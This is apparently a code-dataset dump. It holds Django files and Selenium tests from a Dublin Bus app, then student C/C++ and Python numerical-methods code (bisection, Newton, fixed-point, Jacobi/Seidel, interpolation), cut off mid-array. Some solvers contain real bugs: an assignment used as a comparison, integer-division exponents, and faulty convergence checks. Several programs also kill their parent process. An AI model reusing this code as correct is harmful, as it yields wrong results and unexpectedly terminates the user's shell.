on_delete=django.db.models.deletion.CASCADE, to='Bus.stop')),\n                ('trip_id', models.ForeignKey(db_column='trip_id', on_delete=django.db.models.deletion.CASCADE, to='Bus.trip')),\n            ],\n            options={\n                'db_table': 'stop_times',\n                'managed': True,\n                'unique_together': {('trip_id', 'stop_sequence')},\n            },\n        ),\n        migrations.CreateModel(\n            name='CalendarDate',\n            fields=[\n                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n                ('date', models.IntegerField(blank=True, null=True)),\n                ('exception_type', models.IntegerField(blank=True, null=True)),\n                ('service_id', models.ForeignKey(db_column='service_id', on_delete=django.db.models.deletion.CASCADE, to='Bus.calendar')),\n            ],\n            options={\n                'db_table': 'calendar_dates',\n                'managed': True,\n                'unique_together': {('service_id', 'date')},\n            },\n        ),\n    ]\n" }, { "alpha_fraction": 0.37277618050575256, "alphanum_fraction": 0.44600746035575867, "avg_line_length": 60.97435760498047, "blob_id": "9583113909eeaff37b0d41c1d48a43a7ee4c86da", "content_id": "7f8a8d3b592cae8ef87dac17f8b9156b25af7ffe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2417, "license_type": "no_license", "max_line_length": 120, "num_lines": 39, "path": "/Dublin_Bus/tests/test_gtfsrealtime.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from django.test import TestCase\nfrom Bus.gtfsrealtime import get_arrivals, is_trip_affected\nfrom unittest import mock\n\n\nclass TestGtfsrealtime(TestCase):\n    \"\"\"========================= Testing getArrivals =========================\"\"\"\n\n    def test_get_arrivals_success(self):\n        result = get_arrivals('8220DB000002')\n        self.assertIsInstance(result, dict)\n        self.assertIsInstance(result['delays'], list)\n        self.assertLess(len(result['delays']), 4)\n\n    \"\"\"========================= Testing is_trip_affected =========================\"\"\"\n\n    def test_is_trip_affected(self):\n        mock_target = 'Bus.gtfsrealtime.read_real_time'\n        with mock.patch(mock_target, return_value={\"header\": {\"gtfs_realtime_version\": \"1.0\", \"timestamp\": 1628859302},\n                                                   \"entity\": [{\"id\": \"2720023.y100v.10-64-e19-1.158.I\", 
\"trip_update\": {\n \"trip\": {\"trip_id\": \"2720023.y100v.10-64-e19-1.158.I\",\n \"start_time\": \"08:45:00\", \"start_date\": \"20210813\",\n \"schedule_relationship\": \"SCHEDULED\",\n \"route_id\": \"10-64-e19-1\"}, \"stop_time_update\": [\n {\"stop_sequence\": 1, \"departure\": {\"delay\": 0},\n \"stop_id\": \"8460B5550401\",\n \"schedule_relationship\": \"SCHEDULED\"},\n {\"stop_sequence\": 2, \"arrival\": {\"delay\": 120},\n \"departure\": {\"delay\": 120}, \"stop_id\": \"8470B551411\",\n \"schedule_relationship\": \"SCHEDULED\"}]}}]}):\n res = is_trip_affected(\"2720023.y100v.10-64-e19-1.158.I\", \"8470B551411\")\n self.assertEqual(res, 120)\n\n def test_is_trip_affected_failure(self):\n mock_target = 'Bus.gtfsrealtime.read_real_time'\n with mock.patch(mock_target, return_value={\"Invalid API\"}):\n res = is_trip_affected('1121.y1007.60-27-d12-1.154.O', '8220DB001934')\n self.assertEqual(res, 0)\n" }, { "alpha_fraction": 0.6829268336296082, "alphanum_fraction": 0.6864111423492432, "avg_line_length": 30.88888931274414, "blob_id": "02649788aa4db9e323eb5d648fbebe137966f945", "content_id": "40f8f3edd9c52d790f98ba339ea163e32c90d8c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 287, "license_type": "no_license", "max_line_length": 89, "num_lines": 9, "path": "/Dublin_Bus/Bus/serializers.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from rest_framework import serializers\nfrom .models import Trip, StopTime, Route\n\n\nclass StopTimeSerializer(serializers.ModelSerializer):\n class Meta:\n model = StopTime\n fields = ['arrival_time', 'stop_headsign', 'stop_id', 'stop_sequence', 'trip_id']\n depth = 2\n" }, { "alpha_fraction": 0.6827195286750793, "alphanum_fraction": 0.6940509676933289, "avg_line_length": 28.45833396911621, "blob_id": "a0e7a96cec492c627de69016689547d341edd604", "content_id": "fa18f4e078e2313785c751b63b59e94b8b6b9a40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 706, "license_type": "no_license", "max_line_length": 98, "num_lines": 24, "path": "/Dublin_Bus/users/models.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.contrib.auth.models import User\n\n# Create your models here.\nclass favourite(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n favourite_name = models.CharField(blank=True, null=True, max_length=50, default=\"Saved Route\")\n \n #Origin\n origin_name = models.CharField(max_length=225)\n origin_lat = models.FloatField()\n origin_lon = models.FloatField()\n\n #Destination\n destin_name = models.CharField(max_length=225)\n destin_lat = models.FloatField()\n destin_lon = models.FloatField()\n\n #Bus?\n stops = models.BooleanField(default=False)\n\n class Meta:\n managed = True\n db_table = 'favourites'" }, { "alpha_fraction": 0.5937610864639282, "alphanum_fraction": 0.6288549900054932, "avg_line_length": 33.20000076293945, "blob_id": "b37db889d6730e31617628df75570690b7721b87", "content_id": "0ae2693ee080cbf7f40ac518d53e22ba8dd05c56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5642, "license_type": "no_license", "max_line_length": 147, "num_lines": 165, "path": "/Dublin_Bus/functional_tests/tests_favourites.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom 
selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.webdriver import WebDriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom django.contrib.staticfiles.testing import StaticLiveServerTestCase\nfrom Bus.models import Stop\nfrom users.models import favourite\nfrom django.urls import reverse\nfrom django.contrib import auth\nimport time\n\n\nUser = auth.get_user_model()\n\nclass LoginFunctionalTests(StaticLiveServerTestCase):\n def setUp(self):\n self.browser = webdriver.Chrome('functional_tests/chromedriver.exe')\n demo_user = User(username='myname', email='[email protected]')\n demo_user.is_staff = True\n demo_user.is_superuser = True\n self.demo_passwd = 'password'\n demo_user.set_password(self.demo_passwd)\n demo_user.save()\n self.demo_user = demo_user\n\n demo_favourite = favourite(user_id = self.demo_user.pk,\n origin_name= 'Shankill, Dublin, Ireland',\n origin_lat = 53.2332663, \n origin_lon = -6.1237578, \n destin_name = 'East Wall, Dublin, Ireland', \n destin_lat = 53.3543216, \n destin_lon = -6.2341133,\n stops = 0\n )\n demo_favourite.save()\n\n self.demo_favourite = demo_favourite\n\n self.index_url = self.live_server_url + reverse(\"index\")\n self.login_url = self.live_server_url + reverse(\"login\")\n self.register_url = self.live_server_url + reverse(\"register\")\n self.favourite_url = self.live_server_url + reverse(\"favourites\")\n\n def tearDown(self) -> None:\n self.browser.close()\n\n def test_favourite_go(self):\n self.browser.get(self.login_url)\n self.browser.find_element_by_name(\"username\").send_keys(self.demo_user.username)\n self.browser.find_element_by_name(\"password\").send_keys(self.demo_passwd)\n self.browser.find_element_by_id('submitButton').click()\n\n self.browser.get(self.favourite_url)\n\n self.browser.find_element_by_id('goButton' + str(self.demo_favourite.pk)).click()\n\n self.assertEquals(\n self.browser.current_url,\n self.index_url\n )\n\n self.assertEquals(\n self.browser.find_element_by_id('inputOrigin').get_attribute(\"value\"),\n self.demo_favourite.origin_name\n )\n\n self.assertEquals(\n self.browser.find_element_by_id('inputDestin').get_attribute(\"value\"),\n self.demo_favourite.destin_name\n )\n\n self.assertEquals(\n self.browser.find_element_by_id('favouriteButton').get_attribute('class'),\n \"btn btn-info\"\n )\n \n #Check that mapmarkers exist\n\n def test_favourite_delete(self):\n\n self.browser.get(self.login_url)\n self.browser.find_element_by_name(\"username\").send_keys(self.demo_user.username)\n self.browser.find_element_by_name(\"password\").send_keys(self.demo_passwd)\n self.browser.find_element_by_id('submitButton').click()\n\n self.browser.get(self.favourite_url)\n\n self.browser.find_element_by_id('deleteButton' + str(self.demo_favourite.pk)).click()\n\n self.assertFalse(\n idExists(self, str(self.demo_favourite.pk))\n )\n\n\n\n def test_favourite_go_bus(self):\n\n stop1 = Stop(stop_id=\"8220DB000003\", stop_name=\"Dorset Street Lower, stop 14\", stop_lat=53.358531237878196, stop_lon = -6.2627765057086595)\n stop2 = Stop(stop_id=\"8220DB000014\", stop_name=\"Parnell Square West, stop 3\", stop_lat=53.352308551434895, stop_lon = -6.26381074216821)\n \n stop1.save()\n stop2.save()\n \n bus_favourite = favourite(user_id = self.demo_user.pk,\n origin_name= 'Dorset Street Lower, stop 14',\n origin_lat = 53.358531237878196, \n origin_lon = -6.2627765057086595, \n 
destin_name = 'Parnell Square West, stop 3', \n                        destin_lat = 53.352308551434895, \n                        destin_lon = -6.26381074216821,\n                        stops = 1\n                        )\n\n        bus_favourite.save()\n\n\n\n        self.browser.get(self.login_url)\n        self.browser.find_element_by_name(\"username\").send_keys(self.demo_user.username)\n        self.browser.find_element_by_name(\"password\").send_keys(self.demo_passwd)\n        self.browser.find_element_by_id('submitButton').click()\n\n        self.browser.get(self.favourite_url)\n\n\n        self.browser.find_element_by_id('goButton' + str(bus_favourite.pk)).click()\n\n        self.assertEquals(\n            self.browser.current_url,\n            self.index_url\n        )\n\n        self.assertTrue(\n            self.browser.find_element_by_id('inputFirstStop').is_displayed()\n            #idExists(self, 'inputFirstStop')\n        )\n\n        self.assertTrue(\n            self.browser.find_element_by_id('inputLastStop').is_displayed()\n            #idExists(self, 'inputLastStop')\n        )\n\n        self.assertEquals(\n            self.browser.find_element_by_id('inputFirstStop').get_attribute(\"value\"),\n            bus_favourite.origin_name\n        )\n\n        self.assertEquals(\n            self.browser.find_element_by_id('inputLastStop').get_attribute(\"value\"),\n            bus_favourite.destin_name\n        )\n\n        self.assertEquals(\n            self.browser.find_element_by_id('favouriteButton').get_attribute('class'),\n            \"btn btn-info\"\n        )\n\ndef idExists(self, id):\n    try:\n        # the helper receives the test case, so the lookup must go through its browser\n        self.browser.find_element_by_id(id)\n        return True\n    except NoSuchElementException:\n        return False" } ]
25
dudustefanello/calculo-numerico
https://github.com/dudustefanello/calculo-numerico
f04824b3f3ed4a6e16f76a7a96968560a46c4962
fa6aa51326eeac903b54d0461a8c832d3c6b6c45
70bd493f6cc80ee9f1ca9f1108395a864be2b6f8
refs/heads/master
2021-04-15T18:01:57.107460
2018-06-30T19:28:39
2018-06-30T19:28:39
126,899,181
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.55513596534729, "alphanum_fraction": 0.5815709829330444, "avg_line_length": 20.015872955322266, "blob_id": "e53ff84726e33f60d9bbd3c8a81796d4049181f4", "content_id": "e3cd72d999829623752672cd1ff769b1b093f057", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1325, "license_type": "no_license", "max_line_length": 74, "num_lines": 63, "path": "/raizes/bissecao/bissecao.h", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "#include \"funcoes.h\"\n#include \"../comum.h\"\n\ntypedef struct bissecao{\n int i;\n retorno (*metodo)(double a, double b, double (*funcao)(double));\n char desc[100];\n}bissecao;\n\nint sinal(double x1, double x2){\n if (x1 * x2 < 0) return -1;\n if (x1 * x2 > 0) return 1;\n return 0;\n}\n\nint iteracoes(double a, double b){\n return ceil((log10(b - a) - log10(EPSON)) / log10(2)) - 1;\n}\n\nretorno bissecaoEstimativa(double a, double b, double (*funcao)(double)) {\n retorno ret;\n double x;\n\n ret.y = 1;\n ret.iteracoes = iteracoes(a, b);\n\n for (int i = 0; i <= ret.iteracoes; i++) {\n x = ret.y;\n ret.y = a + (b - a) / 2;\n\n ret.erro = erro(ret.y, x);\n\n if (sinal(funcao(a), funcao(ret.y)) < 0) b = ret.y;\n else a = ret.y;\n }\n return ret;\n}\n\nretorno bissecaoErro(double a, double b, double (*funcao)(double)) {\n retorno ret;\n double x;\n int sai = 0;\n\n ret.y = 1;\n\n for (ret.iteracoes = 0; 1; ret.iteracoes++) {\n x = ret.y;\n ret.y = a + (b - a) / 2;\n ret.erro = erro(ret.y, x);\n\n if (fabs(funcao(ret.y)) < EPSON || sai) break;\n if (ret.erro < EPSON) sai = 1;\n\n if (sinal(funcao(a), funcao(ret.y)) < 0) b = ret.y;\n else a = ret.y;\n }\n return ret;\n}\n\nbissecao bissecoes[] = {\n 0, bissecaoEstimativa, \"Com estimativa de iteracoes\",\n 1, bissecaoErro, \"Com cálculo de erro por iteracao\"\n};\n" }, { "alpha_fraction": 0.46304774284362793, "alphanum_fraction": 0.49705690145492554, "avg_line_length": 17.64634132385254, "blob_id": "ac32286252232a251e833e8e9d66f6c9cc98f97c", "content_id": "afb84671d9eb0966f561b12eeaf5a01c0d4afa31", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1532, "license_type": "no_license", "max_line_length": 53, "num_lines": 82, "path": "/raizes/newton/main.cpp", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "// #include \"newton.h\"\n//\n// using namespace std;\n//\n// void imprimir(tipoEntrada i){\n// retorno ret = executar(i.x0, i.f);\n// if (ret.iteracoes == 1000){\n// printf(\"Função Fi %d não convergiu\\n\\n\", i.f);\n// return;\n// }\n// printf(\"Fi %d: \\n\", i.f);\n// printf(\"Original: %s\\n\", funcoes[i.f].func);\n// printf(\"Fi: %s\\n\", funcoes[i.f].fi);\n// printf(\"x = %lf\\n\", ret.y);\n// printf(\"Iteracoes: %d\\n\", ret.iteracoes);\n// printf(\"Erro: %lf\\n\\n\", ret.erro);\n// }\n//\n// int main(int argc, char const *argv[]) {\n// for (auto &i: entradas) imprimir(i);\n// return 0;\n// }\n\n#include <stdio.h>\n#define _USE_MATH_DEFINES\n#include <cmath>\n\ndouble f1(double x){\n return x*x*x - 2*x*x - 5;\n}\ndouble d1(double x){\n return 3*x*x - 4*x;\n}\n\ndouble f2(double x){\n return x*x*x + 3*x*x - 1;\n}\ndouble d2(double x){\n return 3*x*x + 6*x;\n}\n\ndouble f3(double x){\n return x - cos(x);\n}\ndouble d3(double x){\n return 1 - sin(x);\n}\n\ndouble f4(double x){\n return x - 0.8 - 0.2*sin(x);\n}\ndouble d4(double x){\n return 1 - 0.2*cos(x);\n}\n\nint main(int argc, char const *argv[]) {\n double y, x = 1;\n for 
(size_t i = 0; i < 5; i++) {\n        y = x - f1(x)/d1(x);\n        printf(\"1 %lf\\n\", x);\n        x = y;\n    }\n\n    x = 1; // reinicia o chute inicial para cada funcao\n    for (size_t i = 0; i < 5; i++) {\n        y = x - f2(x)/d2(x);\n        printf(\"2 %lf\\n\", x);\n        x = y;\n    }\n\n    x = 1;\n    for (size_t i = 0; i < 5; i++) {\n        y = x - f3(x)/d3(x);\n        printf(\"3 %lf\\n\", x);\n        x = y;\n    }\n\n    x = 1;\n    for (size_t i = 0; i < 5; i++) {\n        y = x - f4(x)/d4(x);\n        printf(\"4 %lf\\n\", x);\n        x = y;\n    }\n    return 0;\n}\n" }, { "alpha_fraction": 0.5746887922286987, "alphanum_fraction": 0.5871369242668152, "avg_line_length": 20.909090042114258, "blob_id": "a5f2156af38847c62c9983cf2f8191ef8603f641", "content_id": "efccde5380da96db211c9283a97b014709e95486", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 965, "license_type": "no_license", "max_line_length": 82, "num_lines": 44, "path": "/sistemas/jacobi-saidel/main.cpp", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "#include <unistd.h>\n#include <signal.h>\n#include <iostream>\n#include <string.h>\n#include \"jacobi.cpp\"\n\nusing namespace std;\n\nvoid imprimir(){\n    if (!linhas()) fprintf(arquivo, \"A matriz não passou no criterio das linhas!\\n\");\n    else fprintf(arquivo, \"A matriz passou no criterio das linhas.\\n\\n\");\n\n    jacobi();\n    seidel();\n\n    fprintf(arquivo, \"Gaus-Jacobi: \\n\");\n    for (int i = 0; i < ordem; i++) {\n        fprintf(arquivo, \"%c = %3.5lf\\n\", varnomes[i], coeficientes[i]);\n    }\n\n    fprintf(arquivo, \"\\nGaus-Seidel: \\n\");\n    for (int i = 0; i < ordem; i++) {\n        fprintf(arquivo, \"%c = %3.5lf\\n\", varnomes[i], coeficientes2[i]);\n    }\n\n    fprintf(arquivo, \"\\n\");\n    for (int i = 0; i < ordem; i++) {\n        for (int j = 0; j < ordem; j++) {\n            fprintf(arquivo, \"%.1lf \", matriz[i][j]);\n        }\n        fprintf(arquivo, \"%.1lf\\n\", independentes[i]);\n    }\n\n}\n\nint main() {\n    arquivo = fopen(\"saida.txt\", \"w\");\n    imprimir();\n\n    fclose(arquivo);\n\n    kill(getppid(), SIGKILL);\n    return 0;\n}\n" }, { "alpha_fraction": 0.614664614200592, "alphanum_fraction": 0.6271451115608215, "avg_line_length": 19.677419662475586, "blob_id": "8cc438205028fcff70cb195b364b64a7aee962fa", "content_id": "2bfab8028e2d741b183f0c750c626b508a8e65c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 641, "license_type": "no_license", "max_line_length": 56, "num_lines": 31, "path": "/raizes/newton/arquivo.cpp", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "#include <unistd.h>\n#include <signal.h>\n#include \"newton.h\"\n\nusing namespace std;\n\nFILE *arquivo;\n\nvoid imprimir(tipoEntrada i){\n    retorno ret = executar(i.x0, i.f);\n    if (ret.iteracoes == 1000){\n        fprintf(arquivo, \"Funcao %d, nao convergiu\\n\", i.f);\n        return;\n    }\n    fprintf(arquivo, \"Funcao %d: \\n\", i.f);\n    fprintf(arquivo, \"x = %.8lf\\n\", ret.y);\n    fprintf(arquivo, \"Iteracoes: %d\\n\", ret.iteracoes);\n    fprintf(arquivo, \"Erro: %.8lf\\n\\n\", ret.erro);\n}\n\nint main(int argc, char const *argv[]) {\n    arquivo = fopen(\"saida.txt\", \"w\");\n\n    for (auto &i: entradas) imprimir(i);\n\n    fclose(arquivo);\n\n    kill(getppid(), SIGKILL);\n\n    return 0;\n}\n" }, { "alpha_fraction": 0.39022499322891235, "alphanum_fraction": 0.4359968900680542, "avg_line_length": 23.80769157409668, "blob_id": "ecf343e1afab4672def0aed92b8e67c17e1fb2e5", "content_id": "4dcdc0a7c4d0efc7bbce0afd4e07e112776275b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1289, "license_type": "no_license",
"max_line_length": 83, "num_lines": 52, "path": "/interpolacao-newton/PythonApplication2/interpolacao.py", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "import math\n\nentrada = [(-1, math.exp(-1)),\n (-1/2, math.exp(-1/2)),\n (0, math.exp(0)),\n (1/2, math.exp(1/2)),\n (1, math.exp(1))]\n\n\ndiferencas = {}\n\ndiferencas.update({0: []})\nfor i in range(len(entrada) - 1): \n diferencas[0].append((entrada[i + 1][1] - entrada[i][1])/\n (entrada[i + 1][0] - entrada[i][0]))\n\nk = 1\nwhile k < len(entrada) - 1:\n for i in range(len(diferencas[k - 1]) - 1):\n if k not in diferencas:\n diferencas.update({k: []})\n \n diferencas[k].append((diferencas[ k - 1 ][i + 1] - diferencas[k - 1][i])/\n ( entrada[i + k + 1][ 0 ] - entrada[ i ][0]))\n k += 1\n\nx = -0.8\np = entrada[0][1]\n\npoli = str(p)[:7] + '+'\n\nfor i in range(len(diferencas)):\n k = 0\n r = 1\n while k <= i:\n r *= (x - entrada[k][0])\n if entrada[k][0] < 0:\n poli += '(x+' + str(entrada[k][0]*-1)[:7] + ')'\n else:\n poli += '(x-' + str(entrada[k][0])[:7] + ')'\n k += 1;\n p += r * diferencas[i][0]\n poli += '*' + str(diferencas[i][0])[:7]\n\n\nprint('Polinomio = ', str(p)[:10])\nprint(poli + '=' + str(p))\nprint('')\nprint('Euler:', math.exp(x))\nprint('')\nprint('Erro:', p - math.exp(x))\nprint('1--1', 1--1)" }, { "alpha_fraction": 0.503311276435852, "alphanum_fraction": 0.5238410830497742, "avg_line_length": 19.405405044555664, "blob_id": "cc57de8a6cdf9222a82d965717e42025bea2eb06", "content_id": "78f3dd6a81aa5cd68930e8a3c5df63eb6f2778f1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1510, "license_type": "no_license", "max_line_length": 66, "num_lines": 74, "path": "/sistemas/jacobi-saidel/jacobi-seidel.cpp", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "#include \"entrada.h\"\n#define _USE_MATH_DEFINES\n#include <cmath>\n\nFILE *arquivo;\n\ndouble velhos[ordem];\n\nint linhas(){\n double diagonal, soma;\n for (int i = 0; i < ordem; i++) {\n soma = 0;\n for (int j = 0; j < ordem; j++) {\n if (i = j) diagonal = abs(matriz[i][j]);\n else soma += abs(matriz[i][j]);\n }\n if (diagonal <= soma) return 0;\n }\n return 1;\n}\n\nint continuar(){\n for (int i = 0; i < ordem; i++)\n if (fabs(coeficientes[i] - velhos[i]) < epson)\n return 0;\n return 1;\n}\n\nint continuar2(){\n for (int i = 0; i < ordem; i++)\n if (fabs(coeficientes2[i] - velhos[i]) < epson)\n return 0;\n return 1;\n}\n\nvoid jacobi(){\n double soma, coeficiente;\n\n for (int i = 0; i < ordem; i++) velhos[i] = 0;\n\n do {\n for (int i = 0; velhos[i] = coeficientes[i], i < ordem; i++);\n\n for (int i = 0; i < ordem; i++) {\n coeficiente = 0;\n\n soma = independentes[i];\n for (int j = 0; j < ordem; j++)\n if (i != j) soma -= matriz[i][j]*velhos[j];\n\n coeficientes[i] = (1/matriz[i][i])*soma;\n }\n } while (continuar());\n}\n\nvoid seidel(){\n double soma, coeficiente;\n\n for (int i = 0; i < ordem; i++) velhos[i] = 0;\n\n do {\n for (int i = 0; velhos[i] = coeficientes2[i], i < ordem; i++);\n\n for (int i = 0; i < ordem; i++) {\n coeficiente = 0;\n\n soma = independentes[i];\n for (int j = 0; j < ordem; j++)\n if (i != j) soma -= matriz[i][j]*coeficientes2[j];\n\n coeficientes2[i] = (1/matriz[i][i])*soma;\n }\n } while (continuar2());\n}\n" }, { "alpha_fraction": 0.5747126340866089, "alphanum_fraction": 0.6379310488700867, "avg_line_length": 11.428571701049805, "blob_id": "2f9860dfe5f42676741b3fd68cf0b454fb6c9ad3", "content_id": 
"43c026661381c605db155137e6285a440b5a4d83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 174, "license_type": "no_license", "max_line_length": 26, "num_lines": 14, "path": "/raizes/newton/entrada.h", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "#define EPSON 0.00001\n\n#define _USE_MATH_DEFINES\n#include <cmath>\n\ntypedef struct{\n int f;\n double x0;\n}tipoEntrada;\n\ntipoEntrada entradas[] = {\n // 1, M_PI/2,\n 1, 1,\n};\n" }, { "alpha_fraction": 0.6098397970199585, "alphanum_fraction": 0.6167048215866089, "avg_line_length": 23.97142791748047, "blob_id": "fdc32c5f545cef519bdf52c9c686b02181f5edf2", "content_id": "4fdd5105cc65d38113a8a5039c3660c4a547f4d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 874, "license_type": "no_license", "max_line_length": 65, "num_lines": 35, "path": "/raizes/bissecao/arquivo.cpp", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "#include <unistd.h>\n#include <signal.h>\n#include <stdio.h>\n#include \"bissecao.h\"\n\nusing namespace std;\n\nFILE *arquivo;\n\nvoid imprimir(tipoEntrada i, bissecao j){\n retorno ret = j.metodo(i.a, i.b, funcoes[i.f].funcao);\n\n fprintf(arquivo, \"Funcao %d: (%s)\\n\", i.f, funcoes[i.f].desc);\n fprintf(arquivo, \"Metodo: %s)\\n\", j.desc);\n fprintf(arquivo, \"Intervalo: [%.3lf, %.3lf]\\n\", i.a, i.b);\n fprintf(arquivo, \"Iteracoes: %d\\n\", ret.iteracoes);\n fprintf(arquivo, \"x = %.8lf\\n\", ret.y);\n fprintf(arquivo, \"f(x) = %.8lf\\n\", funcoes[i.f].funcao(ret.y));\n fprintf(arquivo, \"Erro = %.8lf\\n\\n\", ret.erro);\n}\n\nint main(int argc, char const *argv[]) {\n arquivo = fopen(\"saida.txt\", \"w\");\n fprintf(arquivo, \"Epson: %lf\\n\\n\", EPSON);\n\n for (auto &i: entradas)\n for (auto &j: bissecoes)\n imprimir(i, j);\n\n fclose(arquivo);\n\n kill(getppid(), SIGKILL);\n\n return 0;\n}\n" }, { "alpha_fraction": 0.2630952298641205, "alphanum_fraction": 0.3273809552192688, "avg_line_length": 35.5217399597168, "blob_id": "e1549b1e862d94ca12aaf153e7d0eda258f2ca8d", "content_id": "14048452adcc0303c599d80dab6978dd80477b14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 840, "license_type": "no_license", "max_line_length": 47, "num_lines": 23, "path": "/sistemas/jacobi-saidel/entrada.h", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "#define epson 0.0001\n\n// #define ordem 3\n// double matriz[ordem][ordem] = {15, 2, -1,\n// 2, 12, 1,\n// 1, 2, 8 },\n// independentes[ordem] = { -200,\n// -250,\n// 30 },\n// coeficientes[ordem] = { 0, 0, 0 },\n// coeficientes2[ordem] = { 0, 0, 0 };\n// char varnomes[ordem] = {'x','y','z'};\n\n#define ordem 3\ndouble matriz[ordem][ordem] = {10, 2, 1,\n 1, 5, 1,\n 2, 3, 10 },\n independentes[ordem] = { 7,\n -8,\n 6 },\n coeficientes[ordem] = { 0, 0, 0 },\n coeficientes2[ordem] = { 0, 0, 0 };\n char varnomes[ordem] = {'x','y','z'};\n" }, { "alpha_fraction": 0.5844155550003052, "alphanum_fraction": 0.5955473184585571, "avg_line_length": 23.5, "blob_id": "dc83df2caabd4fabd85e12cbc54a5764d332fa13", "content_id": "e8a2267c9ea706091fa7e19d6147d48aef708f02", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 542, "license_type": "no_license", "max_line_length": 50, "num_lines": 22, "path": "/raizes/ponto-fixo/main.cpp", "repo_name": "dudustefanello/calculo-numerico", 
"src_encoding": "UTF-8", "text": "#include \"ponto-fixo.h\"\n\nusing namespace std;\n\nvoid imprimir(tipoEntrada i){\n retorno ret = executar(i.x0, i.f);\n if (ret.iteracoes == 1000){\n printf(\"Função Fi %d não convergiu\\n\\n\", i.f);\n return;\n }\n printf(\"Fi %d: \\n\", i.f);\n printf(\"Original: %s\\n\", funcoes[i.f].func);\n printf(\"Fi: %s\\n\", funcoes[i.f].fi);\n printf(\"x = %lf\\n\", ret.y);\n printf(\"Iteracoes: %d\\n\", ret.iteracoes);\n printf(\"Erro: %lf\\n\\n\", ret.erro);\n}\n\nint main(int argc, char const *argv[]) {\n for (auto &i: entradas) imprimir(i);\n return 0;\n}\n" }, { "alpha_fraction": 0.3590005040168762, "alphanum_fraction": 0.48495665192604065, "avg_line_length": 24.802631378173828, "blob_id": "8c1d348c963f74aea5f9d9236cf30415c584456e", "content_id": "9a2a07292f5ecd42666c334f9ec13ffaaeb4fa07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1962, "license_type": "no_license", "max_line_length": 114, "num_lines": 76, "path": "/raizes/ponto-fixo/funcoes.h", "repo_name": "dudustefanello/calculo-numerico", "src_encoding": "UTF-8", "text": "#include \"entrada.h\"\n#include <iostream>\n\n#define _USE_MATH_DEFINES\n#include <cmath>\n\ntypedef struct funcao{\n int i;\n double (*funcao)(double x);\n char func[100], fi[100];\n}funcao;\n\ndouble f01(double x){\n return 2 * cos(x) - x;\n}\ndouble f02(double x){\n return cos(x);\n}\n\ndouble f11(double x){\n return sqrt(7*x);\n}\ndouble f12(double x){\n return x*x/7;\n}\ndouble f13(double x){\n return x*x-6*x;\n}\n\ndouble f21(double x){\n return 2*x + 10*sin(x);\n}\ndouble f22(double x){\n return 10*sin(x) / 2;\n}\n\ndouble f23(double x){\n return acos(-pow(x, 2)/10);\n}\ndouble f24(double x){\n return sqrt(-10*cos(x));\n}\n\ndouble f31(double x){\n return (300 + ((pow(0.25, 2) * 32.17)/0.1)*x*(1 - pow(M_E, (-0.1/0.25)*x)))/((0.25*32.17)/0.1);\n}\n\ndouble f41(double x){\n return pow((3 + x + 2*x*x), 1/4);\n}\ndouble f42(double x){\n return pow((x + 3 - pow(x, 4))/2, 1/2);\n}\ndouble f43(double x){\n return pow((x + 3)/(x*x + 2), 1/2);\n}\ndouble f44(double x){\n return (3*pow(x, 4) + 2*x + 3)/(4*pow(x, 3) + 4*x - 1);\n}\n\nfuncao funcoes[] = {\n 0, f01, \"f(x) = cos(x) - x\", \"fi(x) = 2 * cos(x) - x\",\n 1, f02, \"f(x) = cos(x) - x\", \"fi(x) = cos(x)\",\n 2, f11, \"f(x) = x^2 - 7x\", \"fi(x) = sqrt(7x)\",\n 3, f12, \"f(x) = x^2 - 7x\", \"fi(x) = x^2 / 7\",\n 4, f13, \"f(x) = x^2 - 7x\", \"fi(x) = x^2 - 6x\",\n 5, f21, \"f(x) = x^2 + 10cos(x)\", \"fi(x) = 2x + 10sin(x)\",\n 6, f22, \"f(x) = x^2 + 10cos(x)\", \"fi(x) = 10sin(x)/2\",\n 7, f23, \"f(x) = x^2 + 10cos(x)\", \"fi(x) = acos(pow(-x, 2)/10)\",\n 8, f24, \"f(x) = x^2 + 10cos(x) (Questão 2)\", \"fi(x) = sqrt(-10*cos(x))\",\n 9, f31, \"questao 3\", 